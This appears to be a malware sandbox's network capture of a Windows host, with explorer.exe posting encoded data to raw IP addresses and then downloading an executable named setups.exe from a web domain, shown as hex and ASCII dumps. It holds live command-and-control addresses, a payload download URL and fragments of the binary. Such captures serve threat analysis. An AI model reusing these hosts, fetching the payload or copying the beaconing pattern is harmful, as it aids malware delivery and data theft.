2024-07-27 05:44:09 UTC	236	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 166871
2024-07-27 05:44:09 UTC	16148	OUT	Data Raw: 47 34 6a 50 38 65 69 33 55 2b 63 6b 34 35 51 34 61 4f 39 73 41 58 67 66 64 31 7a 32 4e 64 33 6d 66 67 7a 5a 42 79 79 2b 58 64 6f 59 58 66 54 5a 37 4a 59 72 30 71 59 34 6c 43 2f 64 36 6b 67 44 78 52 6b 71 2f 46 51 75 58 54 43 47 73 69 63 30 31 54 74 35 52 73 6f 32 48 52 65 73 75 46 31 71 74 71 66 6b 51 5a 53 41 4b 75 56 45 67 49 34 43 66 46 48 76 6d 58 54 73 6a 33 43 6f 55 74 41 4e 59 4d 6c 71 4f 65 6a 75 2b 63 79 36 77 62 30 4a 6b 4a 47 35 56 5a 35 6e 51 54 78 55 39 55 31 4c 39 49 55 43 4e 6e 45 5a 39 4f 71 44 57 46 50 38 4b 44 74 4c 4f 72 70 4a 51 44 56 4d 57 41 50 75 4f 62 6a 48 6d 75 6d 68 53 70 76 41 62 49 7a 4f 74 6b 36 75 4f 38 41 62 36 6f 58 72 6e 76 4c 51 6c 7a 50 6e 56 6c 62 73 56 45 49 53 39 31 32 6e 4c 6b 7a 73 33 41 36 77 52 4d 68 4e 47 37 58 Data Ascii: G4jP8ei3U+ck45Q4aO9sAXgfd1z2Nd3mfgzZByy+XdoYXfTZ7JYr0qY4lC/d6kgDxRkq/FQuXTCGsic01Tt5Rso2HResuF1qtqfkQZSAKuVEgI4CfFHvmXTsj3CoUtANYMlqOeju+cy6wb0JkJG5VZ5nQTxU9U1L9IUCNnEZ9OqDWFP8KDtLOrpJQDVMWAPuObjHmumhSpvAbIzOtk6uO8Ab6oXrnvLQlzPnVlbsVEIS912nLkzs3A6wRMhNG7X
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 4f 50 37 39 73 35 37 34 54 44 38 68 62 6a 78 55 59 47 34 32 55 69 68 59 52 63 67 68 59 31 32 6e 32 4e 6b 44 49 74 61 49 72 79 33 61 4f 79 61 31 49 78 47 35 42 42 58 42 78 51 74 35 34 44 70 4d 39 59 68 65 49 45 4b 74 58 4e 65 31 43 53 45 68 6a 4d 76 4a 4a 68 42 68 31 70 73 50 33 67 45 34 4a 68 55 78 49 57 49 5a 34 46 42 5a 41 68 7a 68 51 67 41 32 5a 73 77 74 37 30 45 33 49 72 56 6b 41 46 4f 67 48 39 7a 62 47 2f 2f 48 38 65 43 6f 55 51 39 4c 53 4a 67 4d 65 62 72 35 55 6e 51 6f 43 51 64 78 7a 6d 51 78 52 76 35 51 47 42 4f 70 4d 6e 62 51 51 4e 31 58 6e 54 4f 48 77 61 5a 42 2f 79 5a 61 55 47 64 39 33 63 75 6c 41 49 57 56 58 67 4d 58 46 61 73 63 4b 49 74 59 63 67 44 53 53 79 30 4a 4a 39 6b 6e 46 55 6b 2f 78 57 45 6f 2b 75 4b 49 75 32 33 42 31 58 55 53 72 73 6e Data Ascii: OP79s574TD8hbjxUYG42UihYRcghY12n2NkDItaIry3aOya1IxG5BBXBxQt54DpM9YheIEKtXNe1CSEhjMvJJhBh1psP3gE4JhUxIWIZ4FBZAhzhQgA2Zswt70E3IrVkAFOgH9zbG//H8eCoUQ9LSJgMebr5UnQoCQdxzmQxRv5QGBOpMnbQQN1XnTOHwaZB/yZaUGd93culAIWVXgMXFascKItYcgDSSy0JJ9knFUk/xWEo+uKIu23B1XUSrsn
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 5a 64 48 75 68 30 32 4b 6a 5a 56 31 46 56 31 76 44 74 72 66 4b 50 31 34 58 58 30 4d 51 49 53 64 78 79 66 59 6e 4b 6d 59 57 47 56 7a 49 6c 56 47 51 7a 74 61 49 49 6b 4e 76 75 33 77 53 36 53 49 5a 62 74 61 47 33 67 76 4b 49 32 4a 4b 43 42 55 73 6d 72 6d 31 4d 37 34 4c 78 35 73 4f 4d 6c 51 74 77 49 55 4c 36 64 44 54 4f 6a 50 59 73 44 4b 36 65 4a 73 41 4e 4d 46 36 46 41 43 51 6e 54 65 71 53 43 2b 71 57 77 67 46 54 7a 6b 6b 61 63 69 77 31 4d 36 47 41 79 2f 62 38 57 37 57 6f 77 51 58 6b 2f 51 71 76 63 62 32 77 47 53 61 74 71 55 6c 54 6a 56 4a 67 43 4b 72 46 53 50 79 2f 38 35 54 37 43 52 4c 6d 63 36 43 58 70 33 67 51 58 39 31 61 42 4c 38 6f 79 75 56 42 36 76 74 50 2b 62 41 66 37 42 4b 71 68 75 70 4c 68 54 61 34 36 31 36 30 47 4d 4e 5a 74 6a 70 39 53 78 79 67 6c Data Ascii: ZdHuh02KjZV1FV1vDtrfKP14XX0MQISdxyfYnKmYWGVzIlVGQztaIIkNvu3wS6SIZbtaG3gvKI2JKCBUsmrm1M74Lx5sOMlQtwIUL6dDTOjPYsDK6eJsANMF6FACQnTeqSC+qWwgFTzkkaciw1M6GAy/b8W7WowQXk/Qqvcb2wGSatqUlTjVJgCKrFSPy/85T7CRLmc6CXp3gQX91aBL8oyuVB6vtP+bAf7BKqhupLhTa46160GMNZtjp9Sxygl
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 5a 74 43 56 70 6b 66 6d 2f 68 42 4c 6e 79 55 52 46 37 4a 7a 48 4b 4d 73 48 38 47 66 65 76 4e 33 72 48 58 71 35 58 4d 4a 79 5a 63 54 62 2f 56 36 6a 42 6f 4e 49 36 47 45 6b 54 51 30 45 31 34 31 46 67 50 7a 30 4c 45 4d 4f 4b 4b 34 56 72 45 4f 6e 71 30 4a 69 41 31 30 2f 4d 50 59 7a 72 73 47 2b 6d 68 33 6e 75 6d 69 66 76 77 73 76 54 39 2b 39 58 61 72 4e 4e 44 4b 79 63 4b 39 5a 66 68 6a 66 35 39 75 47 7a 61 33 41 50 71 76 70 4f 31 34 66 51 79 51 58 51 4b 32 49 78 57 73 6f 51 76 4c 2b 43 67 46 77 71 6e 58 68 6e 66 4a 32 52 50 68 6e 4f 6b 46 78 50 77 6d 74 30 54 67 43 4f 53 50 79 4c 6e 2f 44 41 75 78 6f 35 69 37 61 31 51 44 51 37 5a 31 37 30 70 54 74 5a 32 49 76 45 44 75 4d 70 37 54 4a 62 2f 54 58 76 66 7a 75 53 31 58 48 5a 48 6c 53 47 78 4f 78 42 58 70 59 76 70 Data Ascii: ZtCVpkfm/hBLnyURF7JzHKMsH8GfevN3rHXq5XMJyZcTb/V6jBoNI6GEkTQ0E141FgPz0LEMOKK4VrEOnq0JiA10/MPYzrsG+mh3numifvwsvT9+9XarNNDKycK9Zfhjf59uGza3APqvpO14fQyQXQK2IxWsoQvL+CgFwqnXhnfJ2RPhnOkFxPwmt0TgCOSPyLn/DAuxo5i7a1QDQ7Z170pTtZ2IvEDuMp7TJb/TXvfzuS1XHZHlSGxOxBXpYvp
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 39 6d 6f 6b 55 56 34 58 63 39 43 38 78 64 51 46 72 44 4d 70 68 51 69 79 4f 72 4f 78 71 2f 2b 6a 76 4b 47 56 77 73 65 57 7a 4d 32 66 51 70 49 42 54 6f 6f 4d 61 6a 6b 4f 73 4f 51 45 77 38 45 30 30 36 75 58 32 30 43 48 43 4a 43 39 70 52 50 38 4e 68 6d 4c 79 47 57 31 2b 2b 48 41 63 52 42 6c 73 58 6f 43 58 72 62 56 44 4f 50 69 50 36 71 30 43 4c 6e 54 4d 32 30 41 52 4b 33 34 43 57 78 59 59 73 35 79 62 6f 6c 43 39 7a 4c 70 4e 4c 4b 54 2b 73 6e 6c 38 38 49 45 67 50 65 4b 7a 48 2f 63 6c 4f 5a 68 76 74 61 76 6a 2b 67 6f 78 53 69 75 7a 43 4f 38 64 41 53 6d 6f 2b 47 43 53 30 33 57 2f 72 46 53 37 74 67 6d 71 57 4c 44 4a 37 31 49 70 4b 6c 36 56 49 74 58 72 48 35 57 4a 77 5a 32 30 62 57 50 56 30 66 78 48 77 47 75 43 58 68 70 2f 6d 72 6b 58 64 6d 4b 34 33 39 51 38 4c 47 Data Ascii: 9mokUV4Xc9C8xdQFrDMphQiyOrOxq/+jvKGVwseWzM2fQpIBTooMajkOsOQEw8E006uX20CHCJC9pRP8NhmLyGW1++HAcRBlsXoCXrbVDOPiP6q0CLnTM20ARK34CWxYYs5ybolC9zLpNLKT+snl88IEgPeKzH/clOZhvtavj+goxSiuzCO8dASmo+GCS03W/rFS7tgmqWLDJ71IpKl6VItXrH5WJwZ20bWPV0fxHwGuCXhp/mrkXdmK439Q8LG
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 67 51 63 4e 37 70 74 67 64 65 2f 78 34 66 35 4b 66 72 72 71 4e 73 54 58 4a 39 64 53 44 44 44 61 37 70 7a 79 55 78 68 67 70 68 36 50 77 6c 33 6b 6a 31 39 50 6c 57 4b 62 5a 4e 75 58 7a 4b 59 4b 47 73 71 55 41 45 42 48 49 55 31 31 66 44 2b 62 75 6b 73 38 66 70 49 46 53 77 41 69 69 55 2b 66 4b 36 73 36 41 58 46 56 63 2b 62 68 78 39 7a 72 36 43 78 74 64 53 78 5a 57 50 68 68 37 4d 36 32 75 59 49 38 33 48 48 4e 6d 34 74 33 4e 47 54 6c 4a 61 2f 31 63 57 46 43 69 6d 79 53 74 49 6e 2f 38 54 71 59 61 46 46 62 6a 4d 69 46 39 46 6d 62 79 56 4c 64 70 58 52 45 77 7a 72 6a 62 76 44 68 52 41 58 39 36 6d 54 4e 39 6d 6f 69 41 32 7a 61 4e 61 69 33 6f 30 30 6f 7a 73 76 6c 4f 6c 6e 35 52 37 64 55 33 4e 35 31 4d 6a 57 77 4d 4b 4b 6b 33 67 31 4e 59 78 4c 43 55 4b 74 54 61 64 39 Data Ascii: gQcN7ptgde/x4f5KfrrqNsTXJ9dSDDDa7pzyUxhgph6Pwl3kj19PlWKbZNuXzKYKGsqUAEBHIU11fD+buks8fpIFSwAiiU+fK6s6AXFVc+bhx9zr6CxtdSxZWPhh7M62uYI83HHNm4t3NGTlJa/1cWFCimyStIn/8TqYaFFbjMiF9FmbyVLdpXREwzrjbvDhRAX96mTN9moiA2zaNai3o00ozsvlOln5R7dU3N51MjWwMKKk3g1NYxLCUKtTad9
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 6b 37 69 6f 61 34 37 46 41 54 61 6c 6b 72 58 45 61 47 30 74 6c 34 57 4a 32 61 74 41 69 59 4a 7a 51 4f 64 71 72 34 7a 38 61 6f 36 51 45 47 71 63 4a 54 74 53 71 66 55 53 6e 51 36 78 6b 77 54 70 56 59 48 65 7a 71 77 6b 63 5a 49 53 35 50 4d 46 41 71 45 6c 62 73 55 59 4f 61 37 35 4c 6f 69 2f 33 32 50 2f 31 72 48 46 42 79 35 6f 77 2b 4c 6f 6c 66 45 55 70 2b 6c 33 36 56 48 42 6b 63 34 58 63 68 47 72 4a 34 61 66 37 75 4f 32 56 6d 6b 49 58 43 66 34 69 53 46 39 36 6e 6b 66 4a 68 31 7a 63 50 74 38 55 50 41 6b 4f 7a 39 72 6e 50 55 6e 50 5a 65 4e 46 62 42 54 4a 4b 44 45 77 37 4c 4b 43 34 45 44 51 47 62 31 38 56 37 76 38 4a 36 36 61 63 65 73 37 61 72 44 66 6c 31 72 30 39 2f 6f 62 56 62 41 32 37 6b 38 36 6b 54 4b 61 35 38 75 4c 78 4f 41 4d 72 39 6a 6b 51 2b 47 52 55 4f Data Ascii: k7ioa47FATalkrXEaG0tl4WJ2atAiYJzQOdqr4z8ao6QEGqcJTtSqfUSnQ6xkwTpVYHezqwkcZIS5PMFAqElbsUYOa75Loi/32P/1rHFBy5ow+LolfEUp+l36VHBkc4XchGrJ4af7uO2VmkIXCf4iSF96nkfJh1zcPt8UPAkOz9rnPUnPZeNFbBTJKDEw7LKC4EDQGb18V7v8J66aces7arDfl1r09/obVbA27k86kTKa58uLxOAMr9jkQ+GRUO
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 5a 78 47 41 63 52 39 77 6f 78 4f 36 44 52 51 54 34 71 69 54 53 45 6d 31 79 2f 4c 46 73 68 5a 6d 50 4c 68 7a 79 6c 56 70 77 6c 45 75 51 2b 34 49 6a 49 58 76 52 74 52 75 39 6c 56 37 76 52 6f 2b 74 4c 63 68 30 5a 74 71 61 4f 59 65 74 6e 37 48 5a 71 54 47 38 31 77 34 4e 65 58 43 48 61 4c 4c 79 6c 72 67 77 48 52 63 79 4b 68 33 70 61 77 61 36 32 6b 62 5a 36 6e 49 57 4b 5a 63 7a 6b 7a 46 42 2f 58 42 54 44 44 69 54 54 50 45 6a 4e 52 36 51 78 53 46 41 63 79 77 32 59 31 48 5a 4b 56 66 33 6d 76 72 76 72 71 42 6b 48 52 75 4a 5a 56 4b 51 38 43 75 37 48 4a 44 72 7a 49 5a 66 62 6c 4a 42 76 57 35 5a 78 74 67 32 5a 5a 6d 42 51 6a 45 53 56 6f 73 4f 6b 77 48 51 76 55 50 57 37 45 42 57 2f 37 53 44 37 63 74 51 6d 42 48 47 4c 49 64 41 58 6e 62 65 35 73 49 51 37 61 36 76 56 43 Data Ascii: ZxGAcR9woxO6DRQT4qiTSEm1y/LFshZmPLhzylVpwlEuQ+4IjIXvRtRu9lV7vRo+tLch0ZtqaOYetn7HZqTG81w4NeXCHaLLylrgwHRcyKh3pawa62kbZ6nIWKZczkzFB/XBTDDiTTPEjNR6QxSFAcyw2Y1HZKVf3mvrvrqBkHRuJZVKQ8Cu7HJDrzIZfblJBvW5Zxtg2ZZmBQjESVosOkwHQvUPW7EBW/7SD7ctQmBHGLIdAXnbe5sIQ7a6vVC
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 41 4c 50 48 36 46 49 67 34 7a 47 45 39 62 44 4b 39 31 39 44 72 74 37 6b 7a 73 6c 4b 72 55 33 44 39 2f 47 2b 71 50 52 48 49 50 78 50 6a 65 79 4e 32 7a 6a 35 6a 59 76 64 62 79 7a 62 51 76 56 75 41 6e 4b 46 49 73 31 64 79 50 72 41 38 6c 4d 56 64 7a 4d 6f 63 56 57 52 78 30 30 6f 5a 75 6b 4a 4b 66 67 51 76 56 43 50 4d 43 61 38 5a 53 79 2b 4f 74 74 45 72 7a 4d 45 55 71 76 37 4e 6f 55 6a 39 4b 53 78 43 68 4f 6c 49 75 69 6f 6b 6e 55 53 35 6a 58 53 6f 44 4b 31 77 45 33 50 4d 59 53 55 74 51 4b 5a 67 50 72 67 2b 36 79 43 6f 54 65 39 67 69 5a 74 45 65 39 6c 4a 4c 4d 75 43 2b 36 64 72 61 44 48 6f 44 7a 68 70 62 45 31 36 4e 41 4b 70 44 30 68 6b 6b 43 58 30 67 51 52 36 74 4c 6e 75 70 42 54 70 70 65 56 51 59 43 71 71 51 45 36 59 52 6b 63 73 67 56 5a 52 32 78 5a 49 33 71 Data Ascii: ALPH6FIg4zGE9bDK919Drt7kzslKrU3D9/G+qPRHIPxPjeyN2zj5jYvdbyzbQvVuAnKFIs1dyPrA8lMVdzMocVWRx00oZukJKfgQvVCPMCa8ZSy+OttErzMEUqv7NoUj9KSxChOlIuioknUS5jXSoDK1wE3PMYSUtQKZgPrg+6yCoTe9giZtEe9lJLMuC+6draDHoDzhpbE16NAKpD0hkkCX0gQR6tLnupBTppeVQYCqqQE6YRkcsgVZR2xZI3q
2024-07-27 05:44:09 UTC	16384	OUT	Data Raw: 74 52 33 57 30 57 65 73 52 61 47 57 39 75 56 51 7a 76 50 4f 76 6d 52 59 61 50 64 4c 65 4b 6f 6c 4d 66 35 65 6a 50 45 37 38 49 66 34 62 51 61 6d 67 34 4c 32 43 75 57 63 6b 4d 6e 4f 6e 69 6b 4f 76 34 62 66 79 68 6a 68 4b 6b 62 63 59 55 56 72 76 73 61 64 47 68 36 6b 32 74 65 46 34 6f 7a 44 39 49 6f 46 75 57 41 34 67 65 4a 53 73 32 70 33 44 76 79 55 37 75 46 4c 66 2b 49 30 6e 2b 2f 35 4a 50 51 44 62 37 4c 69 6b 48 34 6b 31 51 56 34 6f 54 41 32 47 43 64 72 6f 73 4c 6d 2f 30 44 5a 43 38 66 4e 44 77 63 78 2f 5a 45 74 7a 6d 6f 63 32 39 42 70 53 46 54 54 62 61 30 46 72 6d 43 6e 66 2f 6e 53 71 48 4a 74 32 5a 51 41 59 5a 53 72 72 70 49 34 6f 76 38 6e 50 4b 73 5a 61 4f 55 57 59 74 47 56 4f 63 57 75 35 55 74 2f 53 34 57 48 30 69 6d 30 4d 39 66 75 57 79 2f 66 5a 62 67 Data Ascii: tR3W0WesRaGW9uVQzvPOvmRYaPdLeKolMf5ejPE78If4bQamg4L2CuWckMnOnikOv4bfyhjhKkbcYUVrvsadGh6k2teF4ozD9IoFuWA4geJSs2p3DvyU7uFLf+I0n+/5JPQDb7LikH4k1QV4oTA2GCdrosLm/0DZC8fNDwcx/ZEtzmoc29BpSFTTba0FrmCnf/nSqHJt2ZQAYZSrrpI4ov8nPKsZaOUWYtGVOcWu5Ut/S4WH0im0M9fuWy/fZbg
2024-07-27 05:44:11 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:11 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62255	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:11 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1143
2024-07-27 05:44:11 UTC	1143	OUT	Data Raw: 6b 6a 43 77 2b 39 76 73 4b 68 45 34 43 33 45 42 41 59 54 47 4d 34 4a 39 66 70 4a 7a 6e 30 38 64 34 43 70 72 66 55 51 50 75 68 4c 53 53 57 54 65 71 45 51 6a 78 53 31 62 4d 6c 62 79 2f 52 54 67 47 58 55 61 30 6e 54 50 67 2f 74 47 33 4e 6e 49 78 7a 75 6b 56 2f 30 4c 6c 75 43 2f 56 73 6e 62 34 38 65 4d 38 38 48 52 79 58 62 61 50 51 79 61 52 74 48 55 78 4e 65 2f 70 68 4f 2f 76 35 55 74 72 54 63 44 48 5a 4f 4a 58 34 71 48 34 6d 55 6c 71 42 4b 44 65 6e 72 4f 37 65 50 37 62 54 74 32 71 68 35 64 6f 6e 49 7a 63 2b 4a 71 65 4d 61 41 4d 4b 45 58 38 41 4b 46 4c 56 61 61 72 45 36 34 67 64 79 46 6c 5a 72 2b 71 6b 67 57 31 58 76 32 48 6a 2b 70 2f 30 59 7a 41 37 70 35 4d 62 4c 56 39 33 59 78 6e 6f 4f 68 4a 41 68 74 59 32 37 44 45 68 69 5a 6f 56 70 69 68 55 5a 6d 6d 6d 45 Data Ascii: kjCw+9vsKhE4C3EBAYTGM4J9fpJzn08d4CprfUQPuhLSSWTeqEQjxS1bMlby/RTgGXUa0nTPg/tG3NnIxzukV/0LluC/Vsnb48eM88HRyXbaPQyaRtHUxNe/phO/v5UtrTcDHZOJX4qH4mUlqBKDenrO7eP7bTt2qh5donIzc+JqeMaAMKEX8AKFLVaarE64gdyFlZr+qkgW1Xv2Hj+p/0YzA7p5MbLV93YxnoOhJAhtY27DEhiZoVpihUZmmmE
2024-07-27 05:44:13 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:13 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:13 UTC	685	IN	Data Raw: 63 2b 4d 31 56 4a 69 4c 2b 6e 55 44 62 4b 6e 6a 6b 70 58 76 58 43 33 31 4e 57 44 52 7a 76 54 4a 6b 61 63 70 44 59 39 37 5a 48 78 39 4b 30 59 67 43 42 53 2f 39 64 32 74 32 51 32 32 30 59 78 33 79 6d 2f 70 69 67 56 44 69 6d 65 52 4c 73 2f 4f 35 66 6a 45 53 56 74 59 6c 66 68 58 35 6e 58 75 2b 33 34 62 38 42 4d 68 62 57 48 35 6f 7a 59 6a 34 70 32 68 45 69 4d 4c 62 37 47 59 55 4b 73 32 50 44 4d 6c 59 41 6f 6f 50 36 74 44 2f 46 4c 48 43 4d 37 6f 32 32 6c 5a 4f 76 71 55 35 76 2b 4f 66 44 35 67 6c 30 32 4a 31 62 5a 77 37 78 34 65 4e 56 58 34 78 35 45 54 2f 6b 46 79 74 75 67 73 4d 78 6a 54 75 63 61 65 31 74 6a 45 51 50 73 61 4f 34 64 73 4d 39 59 6c 32 35 4d 4a 73 6c 74 51 79 4e 4e 2b 4e 59 57 55 49 52 36 4d 57 38 35 55 6e 53 6d 51 45 31 41 4f 68 63 6f 4b 57 72 74 Data Ascii: c+M1VJiL+nUDbKnjkpXvXC31NWDRzvTJkacpDY97ZHx9K0YgCBS/9d2t2Q220Yx3ym/pigVDimeRLs/O5fjESVtYlfhX5nXu+34b8BMhbWH5ozYj4p2hEiMLb7GYUKs2PDMlYAooP6tD/FLHCM7o22lZOvqU5v+OfD5gl02J1bZw7x4eNVX4x5ET/kFytugsMxjTucae1tjEQPsaO4dsM9Yl25MJsltQyNN+NYWUIR6MW85UnSmQE1AOhcoKWrt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62258	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:14 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:14 UTC	1122	OUT	Data Raw: 53 67 43 79 54 63 44 30 54 6d 47 37 39 71 71 44 78 77 65 72 65 6f 51 77 54 63 43 53 50 2b 5a 73 57 34 50 51 38 30 68 36 6e 69 65 78 6c 34 68 77 2f 75 71 47 6a 66 6a 36 43 4f 55 76 63 33 2b 6c 36 63 57 53 32 76 4b 69 4a 52 37 38 33 58 44 68 51 39 71 75 35 6c 77 2f 49 74 51 77 34 33 6c 30 61 58 7a 31 31 37 48 58 39 73 73 77 2b 67 37 52 51 66 2f 47 49 46 64 36 46 5a 4d 4a 30 48 48 68 69 69 30 31 78 50 77 67 6e 70 51 30 56 54 63 33 54 76 38 33 53 45 35 44 6e 59 31 50 49 74 47 34 6c 6b 36 43 6d 66 53 75 4c 61 5a 49 46 46 39 49 7a 6d 35 76 6a 4f 31 6b 37 73 76 53 6d 4e 47 2f 56 32 39 38 71 52 77 72 49 72 67 6a 56 2f 73 49 78 38 47 71 34 4a 43 42 45 34 6b 63 33 65 7a 43 50 4f 66 78 44 54 31 70 36 51 78 61 41 32 66 4b 72 7a 46 43 69 41 74 31 31 74 44 6a 68 35 5a Data Ascii: SgCyTcD0TmG79qqDxwereoQwTcCSP+ZsW4PQ80h6niexl4hw/uqGjfj6COUvc3+l6cWS2vKiJR783XDhQ9qu5lw/ItQw43l0aXz117HX9ssw+g7RQf/GIFd6FZMJ0HHhii01xPwgnpQ0VTc3Tv83SE5DnY1PItG4lk6CmfSuLaZIFF9Izm5vjO1k7svSmNG/V298qRwrIrgjV/sIx8Gq4JCBE4kc3ezCPOfxDT1p6QxaA2fKrzFCiAt11tDjh5Z
2024-07-27 05:44:15 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:15 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:15 UTC	685	IN	Data Raw: 47 73 79 4c 68 76 2f 4f 42 72 70 6f 4e 43 39 44 48 31 65 30 55 78 6c 31 4c 53 58 62 4a 64 6b 68 76 75 2f 63 7a 79 6b 7a 4f 5a 48 69 2f 31 4a 48 2f 61 70 67 4c 61 39 63 2f 54 38 41 2b 78 44 6a 2b 78 41 6a 35 50 61 52 67 65 32 58 73 4b 49 79 5a 35 36 5a 7a 69 35 54 45 62 6b 41 74 57 68 54 46 71 33 4f 69 35 4a 51 49 59 49 42 73 42 6e 77 48 52 42 4f 50 4d 73 50 7a 69 61 71 45 2b 78 73 58 39 44 6c 74 75 32 58 77 7a 44 6b 4b 2b 49 69 72 65 34 55 70 73 6e 4b 42 4c 39 69 5a 42 41 44 32 2f 30 58 74 48 6b 49 56 32 45 35 72 50 55 53 74 39 4e 76 2f 7a 50 64 2b 73 68 44 45 51 64 56 4f 62 69 52 4e 4b 51 79 42 36 67 46 6d 78 4e 68 5a 56 7a 61 63 58 51 69 79 67 6f 4e 34 79 45 39 59 46 2f 64 4d 4f 53 68 61 39 55 48 41 53 6f 65 32 78 6b 50 4e 66 72 78 6f 5a 73 4b 66 61 53 Data Ascii: GsyLhv/OBrpoNC9DH1e0Uxl1LSXbJdkhvu/czykzOZHi/1JH/apgLa9c/T8A+xDj+xAj5PaRge2XsKIyZ56Zzi5TEbkAtWhTFq3Oi5JQIYIBsBnwHRBOPMsPziaqE+xsX9Dltu2XwzDkK+Iire4UpsnKBL9iZBAD2/0XtHkIV2E5rPUSt9Nv/zPd+shDEQdVObiRNKQyB6gFmxNhZVzacXQiygoN4yE9YF/dMOSha9UHASoe2xkPNfrxoZsKfaS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62260	162.0.235.84	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:15 UTC	166	OUT	GET /setups.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: funrecipebooks.com
2024-07-27 05:44:15 UTC	289	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: application/x-msdownload last-modified: Wed, 24 Jul 2024 14:01:43 GMT accept-ranges: bytes content-length: 141944 date: Sat, 27 Jul 2024 05:44:15 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-07-27 05:44:15 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 0a d1 c2 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 34 01 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 02 00 00 02 00 00 10 b8 02 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEde"04 @ @`@@
2024-07-27 05:44:15 UTC	8192	IN	Data Raw: 0a 0b 0d 16 13 04 2b 14 09 11 04 93 13 05 07 11 05 6f 87 00 00 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e5 06 6f 6a 00 00 06 07 73 35 01 00 0a 2a 08 2a 00 00 01 10 00 00 00 00 1f 00 30 4f 00 05 17 00 00 01 1b 30 05 00 9a 00 00 00 2a 00 00 11 03 6f 33 00 00 0a 2d 07 72 6a 14 00 70 10 01 04 6f 33 00 00 0a 2d 07 72 b6 14 00 70 10 02 00 0e 04 6f 33 00 00 0a 2d 15 72 e4 14 00 70 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a 2b 10 0e 04 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a de 05 26 14 0c de 44 06 2d 02 14 2a 06 6f 6e 00 00 06 6f 61 00 00 0a 73 85 00 00 0a 0b 0d 16 13 04 2b 14 09 11 04 93 13 05 07 11 05 6f 87 00 00 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e5 06 6f 6a 00 00 06 07 73 35 01 00 0a 2a 08 2a 00 00 01 10 00 00 00 00 1f 00 30 4f 00 05 17 00 00 01 1e 02 7b Data Ascii: +oXi2ojs5*0O0o3-rjpo3-rpo3-rprp(_+rp(_&D-onoas+oXi2ojs5*0O{
